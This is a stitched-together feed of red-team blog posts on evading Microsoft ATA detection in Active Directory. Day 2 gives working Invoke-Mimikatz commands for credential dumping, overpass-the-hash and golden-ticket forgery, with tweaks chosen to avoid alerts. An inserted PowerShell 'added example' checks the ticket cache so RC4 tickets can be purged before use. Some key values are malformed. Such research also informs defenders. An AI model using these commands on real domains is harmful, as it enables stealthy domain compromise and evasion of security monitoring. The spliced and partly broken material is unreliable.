<br />
This makes it much easier to laterally move in the parent domain as we can extract AES keys and avoid detection later.<br />
<br />
<b>Abusing the DNSAdmins group membership</b><br />
<br />
Another attack which is not currently detected by ATA is the ability to run remote code as SYSTEM on a Windows DNS server (or DC - if it works as DNS server as well). Read <a href="https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83">this post</a> and <a href="http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html">this one</a> by me for more details. Also, DNSAdmins is not a protected group :)<br />
<br />
That is all for Day 3!<br />
<br />
<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com2tag:blogger.com,1999:blog-8135211063584500909.post-7522756498844434242017-08-08T21:07:00.003+05:302018-05-03T22:15:43.966+05:30Week of Evading Microsoft ATA - Day 2 - Overpass-the-hash and Golden Ticket<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Welcome to Day 2 of Week of Evading Microsoft ATA. The week has been split into the following days:</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html">Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</a></b><br />
<b>Day 2 - Detection and bypass of overpass-the-hash and golden ticket</b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day3.html">Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day4.html">Day 4 - Bypasses/avoidance by reducing conversation with the DC</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day5.html">Day 5 - Attacking ATA deployment, limitations of research and mitigation</a></b></div>
</div>
</div>
<div style="text-align: justify;">
<b><br />
</b></div>
<div style="text-align: justify;">
We left Day 1 with admin access to the box where a domain admin (DA) token is available. The next step is to get access to the credentials of the DA. Here, credentials could be a clear text password, an NTLM hash, AES keys, a user token etc. </div>
<div style="text-align: justify;">
<br />
<b>Overpass-the-hash</b><br />
Let's pull hashes for the DA "tempDA" using Invoke-Mimikatz:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -ComputerName ops-applocked</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2IdHo46kVTNhJ0Z6e1qEo38gfHxqDJQbIVmDSWoE6c6BXctaJKbxPkQS0VMg3UEpg5hkyCRkDI0aUMz5ifR32JOVveujj_3rknKTW7yi_wbXFlGOwE81RQsUQB1t_utHvk5orsaeHPmw/s1600/DA-NTLM-Hash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="446" data-original-width="868" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2IdHo46kVTNhJ0Z6e1qEo38gfHxqDJQbIVmDSWoE6c6BXctaJKbxPkQS0VMg3UEpg5hkyCRkDI0aUMz5ifR32JOVveujj_3rknKTW7yi_wbXFlGOwE81RQsUQB1t_utHvk5orsaeHPmw/s400/DA-NTLM-Hash.png" width="400" /></a></div>
Once we have access to the NTLM hashes, we can use the <a href="http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash">Overpass-the-hash</a> attack to create a Kerberos ticket and access resources and services as tempDA. From an administrative shell:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"sekurlsa::pth /user:tempda /domain:offensiveps.com /ntlm:a29f7623fd11550def0192de9246f46b /run:powershell.exe"'</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVl0_tazq9BBvW3BwjrAaBKOykMxHYjvuagUgcR0eqVUmRpFTS-Vf0bzapCb5Kgf__0pw-UXLP2VqWe0RlLbV2Uq-gLOq8VlrSy8sZdeJIYBGGi6z6bL26DLGSqsgwM83wzGoPm7aJAMU/s1600/OPTH-Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="671" data-original-width="1449" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVl0_tazq9BBvW3BwjrAaBKOykMxHYjvuagUgcR0eqVUmRpFTS-Vf0bzapCb5Kgf__0pw-UXLP2VqWe0RlLbV2Uq-gLOq8VlrSy8sZdeJIYBGGi6z6bL26DLGSqsgwM83wzGoPm7aJAMU/s400/OPTH-Detection.png" width="400" /></a></div>
We now have DA privileges! Nice, isn't it? Not really! ATA caught us:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPO9UVse7AK29zG0FAqG4Uuaby3Zm6uH8WN4k2By77syNpA6gvBiu59S9wE34ERbhIMJMNur_6SJi2VhW1h_J4XFNRIiz4ck9g76Yc2LVU0Jrv0sYJtdq-s6307ucdb5wxoB8QeX4t5XI/s1600/OPTH-Detection-ATA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="311" data-original-width="979" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPO9UVse7AK29zG0FAqG4Uuaby3Zm6uH8WN4k2By77syNpA6gvBiu59S9wE34ERbhIMJMNur_6SJi2VhW1h_J4XFNRIiz4ck9g76Yc2LVU0Jrv0sYJtdq-s6307ucdb5wxoB8QeX4t5XI/s400/OPTH-Detection-ATA.png" width="400" /></a></div>
What now? If we read the detection, it says "The encryption method of the Encrypted_Timestamp field of AS_REQ message from OPS-USER11 has been downgraded based on previously learned behavior." Ok. Let's investigate this!<br />
<br />
Let's see how the Encrypted_TimeStamp (in the PreAuthentication Data) field of the AS-REQ message looks when normal authentication (cleartext password) is used:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQFiKwBWMaP5b1SObwNvNJky9A-TdNv_7Hf5xNodkgSYxl08qPskmb5cbNxnXqm5CHaAJDgV7OcmXVuep01x838vNh15ed9YvGoBBzbL2EFk3se4SD2WFKc7NINCRC6E4Ahxw8ZPV8OYg/s1600/OPTH-Normal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="674" data-original-width="809" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQFiKwBWMaP5b1SObwNvNJky9A-TdNv_7Hf5xNodkgSYxl08qPskmb5cbNxnXqm5CHaAJDgV7OcmXVuep01x838vNh15ed9YvGoBBzbL2EFk3se4SD2WFKc7NINCRC6E4Ahxw8ZPV8OYg/s400/OPTH-Normal.png" width="400" /></a></div>
Now, below is how the same field looks when we use an NTLM hash for Overpass-the-hash:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb5mk75hoTPt0zu1KWD3lEEq1AXc1NFwkYXeorD39YcwQoO_jU3gdC3BhDeTO4ADqAjaEz5gA9YCUUdlEp0R9ROXEDh6QX9wcqSx4EG1yE_4GBwZ34xK3B9xqBjYAlV-gkEp8Ou8s7v2w/s1600/OPTH-NTLM-Hash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="840" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb5mk75hoTPt0zu1KWD3lEEq1AXc1NFwkYXeorD39YcwQoO_jU3gdC3BhDeTO4ADqAjaEz5gA9YCUUdlEp0R9ROXEDh6QX9wcqSx4EG1yE_4GBwZ34xK3B9xqBjYAlV-gkEp8Ou8s7v2w/s400/OPTH-NTLM-Hash.png" width="400" /></a></div>
So, the encryption type downgrade is quite evident from the screenshots above: with an NTLM hash the pre-authentication timestamp is encrypted with RC4-HMAC (etype 23) instead of the AES256 (etype 18) a normal logon from this client uses. How to avoid this downgrade? By using AES keys! Use the below command to extract the AES keys from a remote computer:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"sekurlsa::ekeys"' -ComputerName ops-applocked</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMH337ZJqUgAK-ydb3XlnFpKVK_k8IkoYyodiXt4e9xqXwjux3ikKJfdl1AbfcXh_cjC9PaPw2Jue1QE6sxuqLGdm1XefWW99JIVsXz3xodZQqx51R9fe9O6TexyZ_TxcA1zEHPAXWG6o/s1600/DA-AES.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="305" data-original-width="1128" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMH337ZJqUgAK-ydb3XlnFpKVK_k8IkoYyodiXt4e9xqXwjux3ikKJfdl1AbfcXh_cjC9PaPw2Jue1QE6sxuqLGdm1XefWW99JIVsXz3xodZQqx51R9fe9O6TexyZ_TxcA1zEHPAXWG6o/s400/DA-AES.png" width="400" /></a></div>
And then use the command shown below (in the screenshot) to pass them for Overpass-the-hash. If the AES128 key is not available it can simply be left out, but it is always advisable to pass all the keys you have (/ntlm, /aes128 and /aes256) together, so that whatever encryption type gets negotiated, the session has a matching key and the request looks like a normal logon:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp06SgE3KAeNyCqoYSFIJWjabd_z4-lHqXQ9-ef8vo09IODMK15gWvNF5tFYAG8W6PQ8WYZOBR0cz5o2q6BaYXxGKmy7mstwKtlR7bAvFQTWEmv0tqffDqYxBx5QrqqwtoP8FE4aJvXic/s1600/OPTH-Bypass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="847" data-original-width="1532" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp06SgE3KAeNyCqoYSFIJWjabd_z4-lHqXQ9-ef8vo09IODMK15gWvNF5tFYAG8W6PQ8WYZOBR0cz5o2q6BaYXxGKmy7mstwKtlR7bAvFQTWEmv0tqffDqYxBx5QrqqwtoP8FE4aJvXic/s400/OPTH-Bypass.png" width="400" /></a></div>
<br />
Bingo! We have elevated our privileges to DA and this doesn't get detected by ATA!<br />
<br />
Please note the following <a href="http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash">from Benjamin's post</a>: "AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with KB2871997, in this case you can avoid NTLM hash."<br />
<br />
Another detection of Overpass-the-hash, as seen in the screenshot above, is "Unusual protocol implementation". I _believe_ that this detection is triggered by another field (the list of supported encryption types) in the AS-REQ packets. I can't confirm this and will welcome more research and comments on it:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ5gWOFtBvh0DUnm3Y6_dOk98stuY9F61bv_0QKnIKHfaksVOaTW8G6TRW3DCh7J8L1Ka_nwiPKqAUtv-ngq-OrFqNuM8cJ7gVJPIjXdmrj-7mFuGJTz66yHb1PJPQaUwbe6ooDY6jWkM/s1600/Unusual+Protocol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="329" data-original-width="868" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ5gWOFtBvh0DUnm3Y6_dOk98stuY9F61bv_0QKnIKHfaksVOaTW8G6TRW3DCh7J8L1Ka_nwiPKqAUtv-ngq-OrFqNuM8cJ7gVJPIjXdmrj-7mFuGJTz66yHb1PJPQaUwbe6ooDY6jWkM/s400/Unusual+Protocol.png" width="400" /></a></div>
Another interesting thing to notice is that we can use Overpass-the-hash to generate false alerts on ATA! Failure events can be generated for any user in the domain, even a non-existent one, and any made-up NTLM hash can be used for this.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoGVGLdbDDbHetaDfBgnczp-zoO96lZGAD6n9rAJfgbF_Vb_3Smec8rewGJFLtQR5pdUtSziOewo-BHV5deCHZROrUHuMOasAr_AUa2hTXlLs1MdUvhe2AIHStNWkUdX1vxGZuWrzlAuc/s1600/OPTH-fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="1101" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoGVGLdbDDbHetaDfBgnczp-zoO96lZGAD6n9rAJfgbF_Vb_3Smec8rewGJFLtQR5pdUtSziOewo-BHV5deCHZROrUHuMOasAr_AUa2hTXlLs1MdUvhe2AIHStNWkUdX1vxGZuWrzlAuc/s400/OPTH-fake.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<b>Golden Ticket</b><br />
Once we have DA access, let's establish persistence in the domain. We can create a Golden Ticket for that. Let's pull the RC4/NTLM hash of the krbtgt account from the domain controller to create a golden ticket.<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"lsadump::lsa /name:krbtgt /patch"' -ComputerName ops-dc
</textarea></pre>
Let's create a golden ticket and inject it in memory. As soon as a resource in the domain is accessed, ATA will detect the golden ticket as:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggJAdIpxPlDyF8wnND-rNCpNcF26w9tFn7brwZk-FMrAypgM0xCRUms6oa2PqhS1kWAfUkyOprX6RyLXwmHi5p6-H0pmj-EC_S7Xup3KjnU_7dSsD0ZFm6YyUT_yFcL1OwNgrDyHoR2WY/s1600/GoldenTicket-Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="286" data-original-width="981" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggJAdIpxPlDyF8wnND-rNCpNcF26w9tFn7brwZk-FMrAypgM0xCRUms6oa2PqhS1kWAfUkyOprX6RyLXwmHi5p6-H0pmj-EC_S7Xup3KjnU_7dSsD0ZFm6YyUT_yFcL1OwNgrDyHoR2WY/s400/GoldenTicket-Detection.png" width="400" /></a></div>
Similar to Overpass-the-hash, ATA looks for an encryption downgrade. Since a golden ticket is a TGT, the focus is on the TGS-REQ packet, where the TGT is presented to the DC. Let's have a look at the encryption method of the ticket field of a TGS-REQ when a user accesses a resource normally:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbkpmAJ64tjUQEZ7kPHssBRknut-RqpWKPc43PNA-DdVsyKp4OZVxO7emXXFTvmo11tJD2dBWqDqtvM9jD7AXKM-ltoWoDfh84N5xYUpuPlMsefzZ3f-_hxGUGMQJPdNTqXmg3poEjOK4/s1600/Golden-Ticket-Normal-TGS-REQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="835" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbkpmAJ64tjUQEZ7kPHssBRknut-RqpWKPc43PNA-DdVsyKp4OZVxO7emXXFTvmo11tJD2dBWqDqtvM9jD7AXKM-ltoWoDfh84N5xYUpuPlMsefzZ3f-_hxGUGMQJPdNTqXmg3poEjOK4/s400/Golden-Ticket-Normal-TGS-REQ.png" width="400" /></a></div>
And this is how a golden ticket generated using the NTLM hash of krbtgt looks:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcDbmVmdm2FKVDqjcz5RRBkmXAa-dw2rF35SiMp24DSjEpk0yBEjq7RC-U7sg9LN6-qdcm0bDmfmYzLE3O8VdaB4BGmxfLuB0Pe4vMetifd6jL9r8bxuaJ3OfbypXz3SJmYKzfaX5SAac/s1600/Golden-Ticket-NTLM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="789" data-original-width="795" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcDbmVmdm2FKVDqjcz5RRBkmXAa-dw2rF35SiMp24DSjEpk0yBEjq7RC-U7sg9LN6-qdcm0bDmfmYzLE3O8VdaB4BGmxfLuB0Pe4vMetifd6jL9r8bxuaJ3OfbypXz3SJmYKzfaX5SAac/s400/Golden-Ticket-NTLM.png" width="400" /></a></div>
Clearly a downgrade. How to make a golden ticket appear normal? Right! AES keys once again!<br />
<br />
Let's use the "/inject" option of the lsadump::lsa module in mimikatz:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"lsadump::lsa /name:krbtgt /inject"' -ComputerName ops-dc
</textarea></pre>
"/inject" provides additional credentials. How? Why? <a href="https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html">See this post.</a><br />
<br />
Once we have the AES keys, a golden ticket can be generated and used without detection:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:offensiveps.com /sid:S-1-5-21-2578538781-2508153159-3419410681 /aes256:75e6d456868270a705e16ffd7a660dc7afe37817564a6470d446ab31f3c1235g /id:500 /groups:513 /ptt"'
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN1dvL8jGCDTs6wOUt81lHUZ5kjvwIhNbxRgrKYcZuSulfbBtCE93qVlFsGmquitHxOubcu6GTKUanTwVBkEFXXdPFmrLumZr-Stcz0qmPQf7nApWw3hdd64SI83CM2eBtR6bTJb1Jync/s1600/Golden-Ticket-Bypass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="1436" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN1dvL8jGCDTs6wOUt81lHUZ5kjvwIhNbxRgrKYcZuSulfbBtCE93qVlFsGmquitHxOubcu6GTKUanTwVBkEFXXdPFmrLumZr-Stcz0qmPQf7nApWw3hdd64SI83CM2eBtR6bTJb1Jync/s400/Golden-Ticket-Bypass.png" width="400" /></a></div>
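Before touching any resource with a ticket obtained by Overpass-the-hash or injected as a golden ticket, it is worth checking what actually landed in the ticket cache. The following is an added example (not part of the original post and not mimikatz code): it parses klist output and flags every ticket whose ticket encryption type or session key type is still RC4, which is the downgrade both ATA alerts above key on. The embedded klist text is a constructed sample in the Windows 8/2012 output format, showing one normal AES256 TGT next to one RC4 ticket for Administrator; on a real host feed it (klist | Out-String).<br />

```powershell
# Added example, not from the original post. Parses "klist" output and reports
# the encryption types of every cached ticket so an RC4 downgrade is visible
# before the ticket is ever presented to the DC.

function Get-KerbTicketEtypes {
    param([Parameter(Mandatory)][string]$KlistOutput)

    # klist prints each cached ticket as a "#n>" block of "Name: value" lines
    $blocks = $KlistOutput -split '(?m)^#\d+>' | Where-Object { $_ -match 'Server:' }
    foreach ($b in $blocks) {
        $field = {
            param($name)
            $rx = '(?m)^\s*' + [regex]::Escape($name) + '\s*:\s*(.+?)\s*$'
            if ($b -match $rx) { $Matches[1] } else { '' }
        }
        $ticketEtype  = & $field 'KerbTicket Encryption Type'
        $sessionEtype = & $field 'Session Key Type'
        [pscustomobject]@{
            Client       = & $field 'Client'
            Server       = & $field 'Server'
            TicketEtype  = $ticketEtype
            SessionEtype = $sessionEtype
            EndTime      = & $field 'End Time'
            # RC4 in either place means the DC saw an RC4 request: the downgrade ATA alerts on
            Downgrade    = ($ticketEtype -match 'RC4') -or ($sessionEtype -match 'RC4')
        }
    }
}

# Constructed sample (not captured from the lab): a normal TGT and an RC4 golden ticket
$sample = @'
Current LogonId is 0:0x3e7b1

Cached Tickets: (2)

#0>     Client: labuser @ OFFENSIVEPS.COM
        Server: krbtgt/OFFENSIVEPS.COM @ OFFENSIVEPS.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 8/7/2017 21:01:00 (local)
        End Time:   8/7/2017 22:01:00 (local)
        Renew Time: 8/14/2017 21:01:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: ops-dc.offensiveps.com

#1>     Client: Administrator @ OFFENSIVEPS.COM
        Server: krbtgt/OFFENSIVEPS.COM @ OFFENSIVEPS.COM
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 8/7/2017 21:05:00 (local)
        End Time:   8/8/2017 7:05:00 (local)
        Renew Time: 8/14/2017 21:05:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
'@

Get-KerbTicketEtypes -KlistOutput $sample | Format-Table Client, TicketEtype, SessionEtype, Downgrade -AutoSize

# On a live box, before accessing anything:
# Get-KerbTicketEtypes -KlistOutput (klist | Out-String) | Where-Object Downgrade
```

If anything comes back with Downgrade set, purge it (klist purge) and redo the attack with the AES keys rather than using the ticket and hoping for the best.<br />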
<br />
<b>Another Golden Ticket Bypass</b><br />
The previous one is not the only golden ticket bypass! When I found out about the next one, I couldn't believe it!<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
I hope the Golden Ticket bypass for <a href="https://twitter.com/hashtag/ATA?src=hash">#ATA</a> I discovered today turns out to be false. Too easy to be true. Can't wait to share :) <a href="https://twitter.com/hashtag/BHUSA?src=hash">#BHUSA</a></div>
— Nikhil Mittal (@nikhil_mitt) <a href="https://twitter.com/nikhil_mitt/status/878252995527364608">June 23, 2017</a></blockquote>
<br />
We can actually avoid golden ticket detection while still using the RC4/NTLM hash of the krbtgt account, simply by using a non-existent username!<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::golden /User:nonexistent /domain:offensiveps.com /sid:S-1-5-21-2578538781-2508153159-3419410681 /rc4:c468ec50882a8b29a0c01d1ed1234567 /id:500 /groups:513 /ptt"'
</textarea></pre>
In ATA 1.8, ticket lifetime based detection was introduced. "If a Kerberos ticket is used for more than the allowed lifetime, ATA will detect it as a suspicious activity" - <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/whats-new-version-1.8">What's new in ATA version 1.8</a><br />
<br />
Now, let's hold our horses and think. Why should we save a golden ticket to disk at all? It is the unchanged krbtgt hash which provides the persistence, NOT the golden ticket. We can always create a golden ticket whenever there is a need to access a resource; just keep the krbtgt hash handy!<br />
<br />
Also, we can set the lifetime of the ticket while creating a golden ticket. Enumerate the Kerberos policy using (Get-DomainPolicy)."Kerberos Policy" from PowerView. The default ticket lifetime is 10 hours; in the lab it is set to 1 hour. To avoid using a ticket beyond its lifetime we can use the following options (all values are in minutes). The golden ticket created by the below command becomes valid two hours after the time of creation, stays valid for one hour and can be renewed for up to 7 days (10080 minutes):<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:offensiveps.com /sid:S-1-5-21-3270384115-3177237293-604223748 /aes256: /id:500 /groups:513 /startoffset:120 /endin:60 /renewmax:10080 /ticket:golden.kirbi"'
</textarea></pre>
Make sure that you purge the golden ticket from the target box otherwise ATA will detect it.<br />
<br />
That is all for Day 2. Hope you liked it! :)<br />
<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittal (http://www.blogger.com/profile/02092541175521734123)<br />
<b>Week of Evading Microsoft ATA - Announcement and Day 1</b> (published 2017-08-07T21:01:00.002+05:30, updated 2018-05-03T22:15:43.893+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I have been playing with <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata">Microsoft Advanced Threat Analytics (ATA)</a> for the past few months. I found it useful for Blue Teams and scary as a Red Teamer, as it detects many Active Directory (AD) tools and techniques. Naturally, I needed ways to bypass it, and that is what motivated me to spend weekends and nights looking for ways out. I found some methods to bypass ATA, some to avoid it and some to attack the ATA installation. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I gave a talk about Evading Microsoft ATA for Active Directory Dominance at Black Hat USA last week (slides at the end of the post) and will speak at 44CON and BruCON on some of the additional research I am doing. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
What I mostly found during my research was that it is not really difficult to evade detection by ATA as long as we are not running tools blindly, without understanding what they do. So, to generate interest in using offensive tools more wisely and in modifying techniques based on the detection mechanisms, in addition to my talks at multiple conferences, I announce a <b>Week of Evading Microsoft ATA </b>beginning on the 7th of August 2017.</div>
<div style="text-align: justify;">
<b><br />
</b></div>
<div style="text-align: justify;">
We will see interesting stuff the whole week, including whatever was discussed in my talk and more:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</b><br />
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html">Day 2 - Detection and bypass of overpass-the-hash and golden ticket</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day3.html">Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day4.html">Day 4 - Bypasses/avoidance by reducing conversation with the DC</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day5.html">Day 5 - Attacking ATA deployment, limitations of research and mitigation</a></b></div>
<br />
<div style="text-align: justify;">
Let's get started with Day 1:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>What is ATA?</b></div>
<div style="text-align: justify;">
ATA is a platform which listens to <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-prerequisites">certain protocols</a> going to the Domain Controllers (DC) of a domain. It can integrate with syslog, SIEM etc. It can detect attacks based on anomalies and on user behaviour. AFAIK, for anomaly detection there is no learning period for some attacks (one week for certain attacks), and for behavioural detection there is a learning period of 21 days. We are going to focus only on the anomaly-based detections.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>ATA Architecture</b></div>
<div style="text-align: justify;">
ATA needs to see the traffic being sent to the DC. Here is how it looks:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGHVouRZFFviXFculrhZhGXVGDuYkTRd_m0iLWNW9_PWUXFMRuhE4SeiYKGYMdegcmh-syR60p7koCysXqleNmKydRdREr5HXAW6AdWXZF2WFy_SLP6KCRMyKFKGNzfDWNWbiWGtpuEJ8/s1600/ATA-Architecture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="771" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGHVouRZFFviXFculrhZhGXVGDuYkTRd_m0iLWNW9_PWUXFMRuhE4SeiYKGYMdegcmh-syR60p7koCysXqleNmKydRdREr5HXAW6AdWXZF2WFy_SLP6KCRMyKFKGNzfDWNWbiWGtpuEJ8/s400/ATA-Architecture.png" width="400" /></a></div>
<div style="text-align: justify;">
The ATA Gateway is the part which reads the traffic and parses it. The ATA Center is the part which receives the parsed traffic, does the analysis, stores everything in a MongoDB database and hosts the ATA console where we can see the alerts. The Gateway can either be a separate box or a Lightweight Gateway which is installed directly on a DC. More on the architecture <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-architecture">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Lab Setup</b></div>
<div style="text-align: justify;">
The lab setup uses a Lightweight ATA Gateway with ATA 1.8 (started with 1.7), which is the latest at the time of writing - 30th July 2017. I use this installation in my PowerShell and Active Directory training and therefore the installation has been tested by more than 400 hackers and infosec professionals in the last 7 months. </div>
<br />
<div style="text-align: justify;">
<b>What attacks can ATA detect?</b></div>
<div style="text-align: justify;">
Many! Have a look at this link: <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-threats">What threats does ATA look for?</a></div>
<div style="text-align: justify;">
The attacks which we are interested in:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Recon</div>
<div style="text-align: justify;">
- Account enumeration</div>
<div style="text-align: justify;">
- NetSession enumeration</div>
<div style="text-align: justify;">
- Directory services enumeration. </div>
<div style="text-align: justify;">
The above attacks result in enumeration of users, computers, group membership, sessions etc. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Compromise Credentials</div>
